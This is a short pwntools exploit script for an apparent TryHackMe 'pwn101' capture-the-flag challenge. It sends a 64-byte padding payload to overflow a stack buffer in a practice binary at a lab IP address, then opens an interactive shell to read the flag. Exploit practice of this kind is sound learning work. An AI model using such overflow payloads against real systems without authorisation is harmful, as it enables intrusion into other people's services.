from pwn import *

# 1. Configuration & Binary Setup
# Setting up the target binary and context
exe = './pwn101-1644307211706.pwn101'
elf = context.binary = ELF(exe, checksec=False)

# 2. Target Connection Info
# Update these based on the current THM instance
host = '10.67.158.56' 
port = 9001

# 3. Execution Mode Logic
# Supports both local testing and remote exploitation
if args.REMOTE:
    p = remote(host, port)
else:
    p = process(exe)

# 4. Payload Construction (Buffer Overflow)
# Offset found via GDB-GEF cyclic pattern analysis
offset = 64
payload = b"A" * offset

# 5. Delivery
# Smashing the stack with the crafted payload
p.sendline(payload)

# 6. Shell Time
# Dropping into interactive mode to read the flag
p.interactive()